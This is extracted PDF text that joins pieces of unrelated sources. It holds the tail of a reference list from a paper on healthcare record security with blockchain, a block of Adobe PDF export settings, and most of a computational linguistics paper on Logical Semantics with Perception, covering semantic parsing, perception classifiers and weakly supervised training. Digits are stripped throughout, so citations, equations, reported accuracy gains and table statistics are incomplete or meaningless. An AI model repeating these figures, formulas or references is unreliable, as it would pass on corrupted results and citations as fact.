system. telecommunication systems doi . /s - - - . tsochev g, trifonov r, yoshinov r, manolov s, popov g, pavlova g. . some security model based on multi agent systems. in: international conference on control, artificial intelligence, robotics & optimization (iccairo). wellington k. . cyberattacks on medical devices and hospital networks: legal gaps and regulatory solutions. santa clara high technolohy law journal ( ): . alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /j.eij. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /jiot. . https://www.oecd.org/sti/ieconomy/ -oecd-privacy-guidelines.pdf http://dx.doi.org/ . /j.im. . http://dx.doi.org/ . /s http://dx.doi.org/ . /jdcta.vol .issue . http://dx.doi.org/ . /jamaophthalmol. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wiljer d, urowitz s, apatu e, delenardo c, eysenbach g, harth t, pai h, leonard kj, canadian committee for patient accessible health records. . patient accessible electronic health records: exploring recommendations for successful implementation strategies. journal of medical internet research ( ):e doi . /jmir. . zhang r, liu l. . security models and requirements for healthcare application clouds. in: ieee rd international conference on cloudcomputing. piscataway: ieee. zhang k, yang k, liang x, su z . . security and privacy for mobile healthcare networks: from a quality of protection perspective. ieee wireless communications. ( ): – . zhang y, wu s, jin b, du j. . a blockchain-based process provenance for cloud forensics. in: rd ieee international conference on computer and communications (iccc). piscataway: ieee, – . zhang n, zhong s, tian l. . using blockchain to protect personal privacy in the scenario of online taxi-hailing. international journal of computers communications & control ( ): – doi . /ijccc. . . . zheng z, xie s, dai hn, wang h. . blockchain challenges and opportunities: a survey. international journal of web and grid services ( ): – doi . /ijwgs. . . zurita l, nøhr c. . patient opinion-ehr assessment from the users perspective. studies in health technology and informatics ( ): – . alruwaili ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jmir. http://dx.doi.org/ . /ijccc. . . http://dx.doi.org/ . /ijwgs. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records ... introduction conclusion and future work references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice transactions of the association for computational linguistics, ( ) – . action editor: jason eisner. submitted / ; revised / ; published / . c© association for computational linguistics. jointly learning to parse and perceive: connecting natural language to the physical world jayant krishnamurthy computer science department carnegie mellon university jayantk@cs.cmu.edu thomas kollar computer science department carnegie mellon university tkollar@andrew.cmu.edu abstract this paper introduces logical semantics with perception (lsp), a model for grounded lan- guage acquisition that learns to map natu- ral language statements to their referents in a physical environment. for example, given an image, lsp can map the statement “blue mug on the table” to the set of image seg- ments showing blue mugs on tables. lsp learns physical representations for both cate- gorical (“blue,” “mug”) and relational (“on”) language, and also learns to compose these representations to produce the referents of en- tire statements. we further introduce a weakly supervised training procedure that estimates lsp’s parameters using annotated referents for entire statements, without annotated ref- erents for individual words or the parse struc- ture of the statement. we perform experiments on two applications: scene understanding and geographical question answering. we find that lsp outperforms existing, less expressive models that cannot represent relational lan- guage. we further find that weakly supervised training is competitive with fully supervised training while requiring significantly less an- notation effort. introduction learning the mapping from natural language to physical environments is a central problem for natu- ral language semantics. understanding this mapping is necessary to enable natural language interactions with robots and other embodied systems. for exam- ple, for an autonomous robot to understand the sen- tence “the blue mug is on the table,” it must be able to identify ( ) the objects in its environment corre- sponding to “blue mug” and “table,” and ( ) the ob- jects which participate in the spatial relation denoted by “on.” if the robot can successfully identify these objects, it understands the meaning of the sentence. the problem of learning to map from natural lan- guage expressions to their referents in an environ- ment is known as grounded language acquisition. in embodied settings, environments consist of raw sensor data – for example, an environment could be an image collected from a robot’s camera. in such applications, grounded language acquisition has two subproblems: parsing, learning the compositional structure of natural language; and perception, learn- ing the environmental referents of individual words. acquiring both kinds of knowledge is necessary to understand novel language in novel environments. unfortunately, perception is often ignored in work on language acquisition. other variants of grounded language acquisition eliminate the need for percep- tion by assuming access to a logical representation of the environment (zettlemoyer and collins, ; wong and mooney, ; matuszek et al., ; chen and mooney, ; liang et al., ). the existing work which has jointly addressed both pars- ing and perception has significant drawbacks, in- cluding: ( ) fully supervised models requiring large amounts of manual annotation and ( ) limited se- mantic representations (kollar et al., ; tellex et al., ; matuszek et al., ). this paper introduces logical semantics with perception (lsp), a model for grounded language acquisition that jointly learns to semantically parse language and perceive the world. lsp models a mapping from natural language queries to sets of ob- jects in a real-world environment. the input to lsp is an environment containing objects, such as a seg- (a) an environment containing objects (image segments). environment: (image on left) knowledge base query: “things to the right of the blue mug” semantic parse grounding: {( , ), ( , )} denotation: { , } (b) lsp predicting the environmental referents of a natural language query. language denotation the mugs { , } the objects on the table { , , } there is an lcd monitor { } is the blue mug right {} of the monitor? the monitor is behind { } the blue cup. (c) training examples for weakly su- pervised training. figure : lsp applied to scene understanding. given an environment containing a set of objects (left), and a natural language query, lsp produces a semantic parse, logical knowledge base, grounding and denotation (middle), using only language/denotation pairs (right) for training. mented image (figure a), and a natural language query, such as “the things to the right of the blue mug.” given these inputs, lsp produces ( ) a logi- cal knowledge base describing objects and relation- ships in the environment and ( ) a semantic parse of the query capturing its compositional structure. lsp combines these two outputs to produce the query’s grounding, which is the set of object referents of the query’s noun phrases, and its denotation, which is the query’s answer (figure b). weakly supervised training estimates parameters for lsp using queries annotated with their denotations in an environment (figure c). this work has two contributions. the first con- tribution is lsp, which is more expressive than pre- vious models, representing both one-argument cat- egories and two-argument relations over sets of ob- jects in the environment. the second contribution is a weakly supervised training procedure that esti- mates lsp’s parameters without annotated semantic parses, noun phrase/object mappings, or manually- constructed knowledge bases. we perform experiments on two different applica- tions. the first application is scene understanding, where lsp grounds descriptions of images in im- age segments. the second application is geograph- ical question answering, where lsp learns to an- swer questions about locations, represented as poly- gons on a map. in geographical question answering, we treat declarative sentences as if they were queries about their subject, e.g., the denotation of “the mug is on the table” is the set of mugs on tables. typically, the denotation of a sentence is either true or false; our treatment is strictly more general, as a sentence’s denotation is nonempty if and only if the sentence is true. lsp correctly answers % more questions than the most comparable state-of-the-art model (matuszek et al., ). in scene understanding, accuracy sim- ilarly improves by %. furthermore, weakly su- pervised training achieves an accuracy within % of that achieved by fully supervised training, while re- quiring significantly less annotation effort. prior work logical semantics with perception (lsp) is related to work from planning, natural language processing, computer vision and robotics. much of the related work focuses on interpreting natural language us- ing a fixed formal representation. some work con- structs integrated systems which execute plans in re- sponse to natural language commands (winograd, ; hsiao et al., ; roy et al., ; skubic et al., ; macmahon et al., ; levit and roy, ; kruijff et al., ). these systems parse natural language to a formal representation which can be executed using a set of fixed control pro- grams. similarly, work on semantic parsing learns to map natural language to a given formal repre- sentation. semantic parsers can be trained using sentences annotated with their formal representation (zelle and mooney, ; zettlemoyer and collins, ; kate and mooney, ; kwiatkowski et al., ) or various less restrictive annotations (clarke et al., ; liang et al., ; krishnamurthy and mitchell, ). finally, work on grounded lan- guage acquisition leverages semantic parsing to map from natural language to a formal representation of an environment (kate and mooney, ; chen and mooney, ; shimizu and haas, ; matuszek environment d know. base Γ mug( ) mug( ) blue( ) table( ) on-rel( , ) on-rel( , ) ... (a) perception fper produces a logical knowl- edge base Γ from the environment d using an independent classifier for each category and relation. language z “blue mug on table” logical form ` λx.∃y.blue(x) ∧ mug(x) ∧ on-rel(x,y) ∧ table(y) (b) semantic parsing fprs maps language z to a log- ical form `. grounding: g = {( , )}, denotation: γ = { } { } { } blue(x) { , } mug(x) {( , ), ( , )} {( , ), ( , )} on-rel(x,y) { } table(y) (c) evaluation feval evaluates a logical form ` on a logical knowledge base Γ to produce a grounding g and denotation γ. figure : overview of logical semantics with perception (lsp). et al., ; dzifcak et al., ; cantrell et al., ; chen and mooney, ). all of this work as- sumes that the formal environment representation is given, while lsp learns to produce this formal rep- resentation from raw sensor input. most similar to lsp is work on simultaneously understanding natural language and perceiving the environment. this problem has been addressed in the context of robot direction following (kollar et al., ; tellex et al., ) and visual attribute learning (matuszek et al., ). however, this work is less semantically expressive than lsp and trained using more supervision. the g model (kol- lar et al., ; tellex et al., ) assumes a one- to-one mapping from noun phrases to entities and is trained using full supervision, while lsp allows one-to-many mappings from noun phrases to entities and can be trained using minimal annotation. ma- tuszek et al. ( ) learns only one-argument cate- gories (“attributes”) and requires a fully supervised initial training phase. in contrast, lsp models two- argument relations and allows for weakly supervised supervised training throughout. logical semantics with perception logical semantics with perception (lsp) is a model for grounded language acquisition. lsp accepts as input a natural language statement and an environ- ment and outputs the objects in the environment de- noted by the statement. the lsp model has three components: perception, parsing and evaluation (see figure ). the perception component constructs logical knowledge bases from low-level feature- based representations of environments. the pars- ing component semantically parses natural language into lambda calculus queries against the constructed knowledge base. finally, the evaluation compo- nent deterministically executes this query against the knowledge base to produce lsp’s output. the output of lsp can be either a denotation or a grounding. a denotation is the set of entity refer- ents for the phrase as a whole, while a grounding is the set of entity referents for each component of the phrase. the distinction between these two outputs is shown in figure b. in this example, the denotation is the set of “things to the right of the blue mug,” which does not include the blue mug itself. on the other hand, the grounding includes both the refer- ents of “things” and “blue mug.” only denotations are used during training, so we ignore groundings in the following model description. however, ground- ings are used in our evaluation, as they are a more complete description of the model’s understanding. formally, lsp is a linear model f that predicts a denotation γ given a natural language statement z in an environment d. as shown in figure , the struc- ture of lsp factors into perception (fper), semantic parsing (fprs) and evaluation (feval) components us- ing several latent variables: f(γ, Γ,`,t,z,d; θ) = fper(Γ,d; θper)+ fprs(`,t,z; θprs) + feval(γ, Γ,`) lsp assumes access to a set of predicates that take either one argument, called categories (c ∈ c) or two arguments, called relations (r ∈ r). these predicates are the interface between lsp’s percep- tion and parsing components. the perception func- tion fper takes an environment d and produces a log- the set of predicates are derived from our training data. see section . . γ feval Γd fper ℓ z fprs t figure : factor graph of lsp. the environment d and language z are given as input, from which the model predicts a logical knowledge base Γ, logical form `, syntactic tree t and denotation γ. ical knowledge base Γ that assigns truth values to instances of these predicates using parameters θper. this function uses an independent classifier to pre- dict the instances of each predicate. the seman- tic parser fprs takes a natural language statement z and produces a logical form ` and syntactic parse t using parameters θprs. the logical form ` is a database query expressed in lambda calculus nota- tion, constructed by logically combining the given predicates. finally, the evaluation function feval de- terministically evaluates the logical form ` on the knowledge base Γ to produce a denotation γ. these components are illustrated in figure . the following sections describe the percep- tion function (section . ), semantic parser (sec- tion . ), evaluation function (section . ), and in- ference (section . ) in more detail. . perception function the perception function fper constructs a logical knowledge base Γ given an environment d. the per- ception function assumes that an environment con- tains a collection of entities e ∈ ed. the knowl- edge base produced by perception is a collection of ground predicate instances using these entities. for example, in figure a, the entire image is the envi- ronment, and each image segment is an entity. the logical knowledge base Γ contains the shown pred- icate instances, where the categories include blue, mug and table, and the relations include on-rel. the perception function scores logical knowledge bases using a set of per-predicate binary classifiers. these classifiers independently assign a score to whether each entity (entity pair) is an element of each category (relation). let γc ∈ Γ denote the set of entities which are elements of category c; simi- larly, let γr ∈ Γ denote the set of entity pairs which are elements of the relation r. given these sets, the score of a logical knowledge base Γ factors into per- relation and per-category scores h: fper(Γ,d; θper) = ∑ c∈c h(γc,d; θcper) + ∑ r∈r h(γr,d; θrper) the per-predicate scores are in turn given by a sum of per-element classification scores: h(γc,d; θcper) = ∑ e∈ed γc(e)(θcper) tφcat(e) h(γr,d; θrper) = ∑ (e ,e )∈ed γr(e ,e )(θ r per) tφrel(e ,e ) each term in the above sums represents a single binary classification, determining the score for a sin- gle entity (entity pair) belonging to a particular cat- egory (relation). we treat γc and γr as indicator functions for the sets they denote, i.e., γc(e) = for entities e in the set, and otherwise. similarly, γr(e ,e ) = for entity pairs (e ,e ) in the set, and otherwise. the features of these classifiers are given by φcat and φrel, which are feature functions that map entities and entity pairs to feature vectors. the parameters of these classifiers are given by θcper and θrper. the perception parameters θper contain one such set of parameters for every category and re- lation, i.e., θper = {θcper : c ∈ c}∪{θrper : r ∈ r}. . semantic parser the goal of semantic parsing is to identify which portions of the input natural language denote enti- ties and relationships between entities in the envi- ronment. semantic parsing accomplishes this goal by mapping from natural language to a logical form that explicitly describes the language’s entity refer- ents using one- and two-argument predicates. the logical form is combined with instances of these predicates to produce the statement’s denotation. lsp’s semantic parser is defined using combina- tory categorial grammar (ccg) (steedman, ). the grammar of the parser is given by a lexicon Λ which maps words to syntactic categories and logi- cal forms. for example, “mug” may have the syn- tactic category n for noun, and the logical form λx.mug(x), denoting the set of all entities x such that mug is true. during parsing, the logical forms for adjacent phrases are combined to produce the logical form for the complete statement. the n/n λf.f mugs n λx.mug(x) n : λx.mug(x) are (s\n)/n λf.λg.λx.g(x) ∧f(x) right n/pp λf.λx.∃y.right-rel(x,y) ∧f(y) of pp/n λf.f the n/n λf.f monitor n λx.monitor(x) n : λx.monitor(x) pp : λx.monitor(x) n : λx.∃y.right-rel(x,y) ∧monitor(y) s\n : λg.λx.∃y.g(x) ∧right-rel(x,y) ∧monitor(y) s : λx.∃y.mug(x) ∧right-rel(x,y) ∧monitor(y) figure : example parse of “the mugs are right of the monitor.” the first row of the derivation retrieves lexical categories from the lexicon, while the remaining rows represent applications of ccg combinators. figure illustrates how ccg parsing produces a syntactic tree t and a logical form `. the top row of the parse represents retrieving a lexicon entry for each word. each successive row combines a pair of entries by applying a logical form to an adjacent ar- gument. a given sentence may have multiple parses like the one shown, using a different set of lexicon entries or a different order of function applications. the semantic parser scores each such parse, learning to distinguish correct and incorrect parses. the semantic parser in lsp is a linear model over ccg parses (`,t) given language z: fprs(`,t,z; θprs) = θ t prsφprs(`,t,z) here, φprs(`,t,z) represents a feature function map- ping ccg parses to vectors of feature values. φprs factorizes according to the tree structure of the ccg parse; it contains features for local parsing opera- tions which are summed to produce the feature val- ues for a tree. if the parse tree is a terminal, then: φprs(`,t,z) = (lexicon entry) the notation (x) denotes a vector with a single one entry whose position is determined by x. the termi- nal features are indicator features for each lexicon entry, as shown in the top row of figure . these features allow the model to learn the correct syntac- tic and semantic function of each word. if the parse tree is a nonterminal, then: φprs(`,t,z) = φprs(left(`,t,z)) + φprs(right(`,t,z)) + (combinator) these nonterminal features are defined over combi- nator rules in the parse tree, as in the remaining rows of figure . these features allow the model to learn which adjacent parse trees are likely to combine. we refer the reader to zettlemoyer and collins ( ) for more information about ccg semantic parsing. . evaluation function the evaluation function feval deterministically scores denotations given a logical form ` and a logical knowledge base Γ. intuitively, the evalu- ation function simply evaluates the query ` on the database Γ to produce a denotation. the evaluation function then assigns score to this denotation, and score −∞ to all other denotations. we describe feval by giving a recurrence for com- puting the denotation γ of a logical form ` on a log- ical knowledge base Γ. this evaluation takes the form of a tree, as in figure c. the base cases are: • if ` = λx.c(x) then γ = γc. • if ` = λx.λy.r(x,y), then γ = γr. the denotations for more complex logical forms are computed recursively by decomposing ` accord- ing to its logical structure. our logical forms con- tain only conjunctions and existential quantifiers; the corresponding recursive computations are: • if ` = λx.` (x) ∧ ` (x), then γ(e) = iff γ (e) = ∧γ (e) = . • if ` = λx.∃y.` (x,y), then γ(e ) = iff ∃e .γ (e ,e ) = . note that a similar recurrence can be used to com- pute groundings: simply retain the satisfying assign- ments to existentially-quantified variables. . inference the basic inference problem in lsp is to predict a denotation γ given language z and an environment d. this inference problem is straightforward due to the deterministic structure of feval. the highest- scoring γ can be found by independently maximiz- ing fprs and fper to find the highest-scoring logical form ` and logical knowledge base Γ. deterministi- cally evaluating the recurrence for feval using these values yields the highest-scoring denotation. another inference problem occurs during train- ing: identify the highest-scoring logical form and knowledge base which produce a particular denota- tion. our approximate inference algorithm for this problem is described in section . . weakly supervised parameter estimation this section describes a weakly supervised training procedure for lsp, which estimates parameters us- ing a corpus of sentences with annotated denota- tions. the algorithm jointly trains both the pars- ing and the perception components of lsp to best predict the denotations of the observed training sen- tences. our approach trains lsp as a maximum margin markov network using the stochastic subgra- dient method. the main difficulty is computing the subgradient, which requires computing values for the model’s hidden variables, i.e., the logical knowl- edge base Γ and semantic parse ` that are responsi- ble for the model’s prediction. . stochastic subgradient method the training procedure trains lsp as a maximum margin markov network (taskar et al., ), a structured analog of a support vector machine. the training data for our weakly supervised algorithm is a collection {(zi,γi,di)}ni= , consisting of language zi paired with its denotation γi in environment di. given this data, the parameters θ = [θprs,θper] are estimated by minimizing the following objective function: o(θ) = λ ||θ|| + n [ n∑ i= ζi ] ( ) where λ is a regularization parameter that controls the trade-off between model complexity and slack penalties. the slack variable ζi represents a margin violation penalty for the ith training example, de- fined as: ζi = max γ,Γ,`,t [ f(γ, Γ,`,t,zi,di; θ) + cost(γ,γi) ] − max Γ,`,t f(γi, Γ,`,t,zi,di; θ) the above expression is the structured counterpart of the hinge loss, where cost(γ,γi) is the margin by which γi’s score must exceed γ’s score. we let cost(γ,γi) be the hamming cost; it adds a cost of for each entity e such that γi(e) = γ(e). we optimize this objective using the stochastic subgradient method (ratliff et al., ). to com- pute the subgradient gi, first compute the highest- scoring assignments to the model’s hidden variables: γ̂, Γ̂, ˆ̀, t̂ ←arg max γ,Γ,`,t f(γ, Γ,`,t,zi,di; θj) + cost(γ,γi) ( ) Γ∗,`∗, t∗ ←arg max Γ,`,t f(γi, Γ,`,t,zi,di; θj) ( ) the first set of values (e.g., ˆ̀) are the best ex- planation for the denotation γ̂ which most violates the margin constraint. the second set of values (e.g., `∗) are the best explanation for the true de- notation γi. the subgradient update increases the weights of features that explain the true denotation, while decreasing the weights of features that explain the denotation violating the margin. the subgradi- ent factors into parsing and perception components: gi = [giprs,g i per]. the parsing subgradient is: giprs = φprs( ˆ̀, t̂,zi) − φprs(`∗, t∗,zi) the subgradient of the perception parameters θper factors into subgradients of the category and relation classifier parameters. recall that θper = {θcper : c ∈ c}∪{θrper : r ∈ r}. let γ̂c ∈ Γ̂ be the best margin- violating set of entities for c, and γc∗ ∈ Γ∗ be the best truth-explaining set of entities. similarly define γ̂r and γr∗. the subgradients of the category and relation classifier parameters are: gi,cper = ∑ e∈e di (γ̂c(e) −γc∗(e)) φcat(e) gi,rper = ∑ (e ,e )∈edi (γ̂r(e ,e ) −γr∗(e ,e )) φrel(e ,e ) . inference: computing the subgradient solving the maximizations in equations and is challenging because the weights placed on the de- notation γ couple fprs and fper. due to this cou- pling, exactly solving these problems requires ( ) enumerating all possible logical forms `, and ( ) for each logical form, finding the highest-scoring logi- cal knowledge base Γ by propagating the weights on γ back through feval. we use a two-step approximate inference algo- rithm for both maximizations. the first step per- forms a beam search over ccg parses, producing k possible logical forms ` , ...,`k. the second step uses an integer linear program (ilp) to find the best logical knowledge base Γ given each parse `i. in our experiments, we parse with a beam size of , then solve an ilp for each of the highest-scoring logical forms. the highest-scoring parse/logical knowledge base pair is the approximate maximizer. given a logical form ` output by beam search, the second step of inference computes the best values for the logical knowledge base Γ and denotation γ: max Γ,γ fper(Γ,d; θper) + feval(γ,`, Γ) + ψ(γ) ( ) here, ψ(γ) = ∑ e∈ed ψeγ(e) represents a set of weights on the entities in the predicted denotation γ. for equation , ψ represents cost(γ,γi). for equa- tion , ψ is a hard constraint encoding γ = γi (i.e., ψ(γ) = −∞ when γ = γi and otherwise). we encode the maximization in equation as an ilp. for each category c and relation r, we create bi- nary variables γc(e ) and γr(e ,e ) for each entity in the environment, e ,e ∈ ed. we similarly create binary variables γ(e) for the denotation γ. using the fact that fper is a linear function of these variables, we write the ilp objective as: fper(Γ,d; θper) + ψ(γ) = ∑ e ∈ed ∑ c∈c wce γ c(e ) + ∑ e ,e ∈ed ∑ r∈r wre ,e γ r(e ,e ) + ∑ e ∈ed ψe γ(e ) where the weights wce and w r e ,e determine how likely it is that each entity or entity pair belongs to the predicates c and r: wce = (θ c per) tφcat(e ) wre ,e = (θ r per) tφrel(e ,e ) the ilp also includes constraints and additional auxiliary variables that represent feval. these con- straints couple the denotation γ and the logical knowledge base Γ such that γ is the result of evaluat- ing ` on Γ. ` is recursively decomposed as in section . , and each intermediate set of entities in the recur- rence is given its own set of |ed| (or |ed| ) variables. these variables are then logically constrained to en- force `’s structure. evaluation our evaluation performs three major comparisons. first, we examine the performance impact of weakly supervised training by comparing weakly and fully supervised variants of lsp. second, we examine the performance impact of modelling relations by com- paring against a category-only baseline, which is an ablated version of lsp similar to the model of ma- tuszek et al. ( ). finally, we examine the causes of errors by performing an error analysis of lsp’s semantic parser and perceptual classifiers. before describing our results, we first describe some necessary set-up for the experiments. these sections describe the data sets, features, construc- tion of the ccg lexicon, and details of the models. our data sets and additional evaluation resources are available online from http://rtw.ml.cmu.edu/ tacl _lsp/. . data sets we evaluate lsp on two applications: scene un- derstanding (scene) and geographical question an- swering (geoqa). these data sets are collections {(zi,γi,di,`i, Γi)}ni= , consisting of a number of natural language statements zi with annotated deno- tations γi in environments di. for fully supervised training, each statement is annotated with a gold standard logical form `i, and each environment with a gold standard logical knowledge base Γi. statistics of these data sets are shown in table , and example environments and statements are shown in figure . the scene data set consists of segmented images of indoor environments containing a number of or- dinary objects such as mugs and monitors. each image is an environment, and each image segment (bounding box) is an entity. we collected natural language descriptions of each scene from members of our lab and amazon mechanical turk, asking subjects to describe the objects in each scene. the authors then manually annotated the collected state- ments with their denotations and logical forms. in this data set, each image contains the same set of ob- jects; note that this does not trivialize the task, as the model only observes visual features of the objects, which are not consistent across environments. the geoqa data set consists of several maps containing entities such as cities, states, national parks, lakes and oceans. each map is an envi- ronment, and its component entities are given by polygons of latitude/longitude coordinates marking data set statistics scene geoqa # of environments mean entities / environment d . . mean # of entities in denotation γ . . # of statements mean words / statement . . mean predicates / log. form . . # of preds. in annotated worlds lexicon statistics # of words in lexicon # of lexicon entries mean parses / statement . . table : statistics of the two data sets used in our evaluation, and of the generated lexicons. their boundaries. furthermore, each entity has one known name (e.g., “greenville”). in this data set, distinct entities occur on average in . environ- ments; repeated entities are mostly large locations, such as states and oceans. the language for this data set was contributed by members of our research group, who were instructed to provide a mixture of simple and complex geographical questions. the authors then manually annotated each question with a denotation (its answer) and a logical form. . features the features of both applications are intended to capture properties of entities and relations between them. as such, both applications share a set of phys- ical features which are functions of the bounding polygons of each entity. example category features (φcat) are the area and perimeter of the entity, and an example relation feature (φrel) is the distance be- tween entity centroids. the scene data set additionally includes visual appearance features in φcat to capture visual proper- ties of objects. these features include a histogram of oriented gradients (hog) (dalal and triggs, ) and an rgb color histogram. the geoqa data set additionally includes dis- tributional semantic features to distinguish between different types of entities (e.g., states vs. lakes) and to capture non-spatial relations (e.g., capitals of states). these features are derived from phrase co-occurrences with entity names in the clueweb polygons were extracted from openstreetmap, http:// www.openstreetmap.org/. web corpus. the category features φcat include in- dicators for the contexts which most frequently occur with an entity’s name (e.g., “x is a city”). similarly, the relation features φrel include indica- tors for the most frequent contexts between two entities’ names (e.g., “x in eastern y ”). . lexicon induction one of the inputs to the semantic parser (section . ) is a lexicon that lists possible syntactic and seman- tic functions for each word. together, these per- word entries define the set of possible logical forms for every statement. each word may have mul- tiple lexicon entries to capture uncertainty about its meaning. for example, the word “right” may have entries n : λx.right(x) and n/pp : λf.λx.∃y.right-rel(x,y) ∧f(y). the semantic parser learns to distinguish among these interpreta- tions to produce good logical forms. we automatically generated lexicons for both applications using part-of-speech tag heuristics. these heuristics map words to lexicon entries con- taining category and relation predicates derived from the word’s lemma. nouns and adjectives pro- duce lexicon entries containing either categories or relations (as shown above for “right”). mapping these parts-of-speech to relations is necessary for phrases like “to the right of,” where the noun “right” denotes a relation. verbs and prepositions pro- duce lexicon entries containing relations. additional heuristics generate semantically-empty lexicon en- tries, allowing words like determiners to have no physical interpretation. finally, there are special heuristics for forms of “to be” and, in geoqa, to handle known entity names. the complete set of lexicon induction heuristics is available online. the automatically generated lexicon makes it dif- ficult to compare semantic parses across models, since the correctness of a semantic parse depends on the learned perceptual classifiers. to facilitate such a comparison (section . ), we filtered out lexicon entries containing predicates which were not used in any of the annotated logical forms. statistics of the filtered lexicons are shown in table . http://www.lemurproject.org/clueweb / we used the stanford pos tagger (toutanova et al., ). environment d language z and predicted logical form ` predicted grounding true grounding monitor to the left of the mugs {( , ), ( , )} {( , ), ( , )} λx.∃y.monitor(x) ∧ left-rel(x,y) ∧ mug(y) mug to the left of the other mug {( , )} {( , )} λx.∃y.mug(x) ∧ left-rel(x,y) 